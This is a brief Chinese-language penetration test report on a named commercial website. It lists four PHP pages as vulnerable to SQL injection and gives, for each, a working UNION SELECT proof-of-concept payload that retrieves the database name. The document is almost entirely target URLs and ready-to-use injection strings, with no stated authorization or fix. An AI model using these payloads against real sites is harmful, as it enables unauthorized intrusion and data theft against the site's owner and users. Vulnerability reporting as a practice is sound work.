# 

## 目标站点

对目标站点 http://www.techmart.com.hk 进行渗透测试

​	

## 测试结果

**漏洞类型：**SQL注入漏洞

**漏洞等级：**中危

**漏洞危害：**危害后端

**漏洞位置：**

1. /Coating_Services/latest_news_detail.php?id=1
2. /Coating_Services/product.php?id=1
3. /Industrial_Machinery/latest_news_detail.php?id=10
4. /Industrial_Machinery/product.php?id=1

**漏洞复现：**

- /Coating_Services/latest_news_detail.php?id=1：
  - poc：`?id=-1 union select 1,2,3,database(),5,6--+`
- /Coating_Services/product.php?id=1：
  - poc：`?id=-1 union select 1,2,3,4,5,database(),7,8,9--+`
- /Industrial_Machinery/latest_news_detail.php?id=10：
  - poc：`?id=-1 union select 1,2,database(),4,5--+`
- /Industrial_Machinery/product.php?id=1：
  - poc：`?id=-1 union select 1,2,3,4,5,database(),7,8,9,10--+`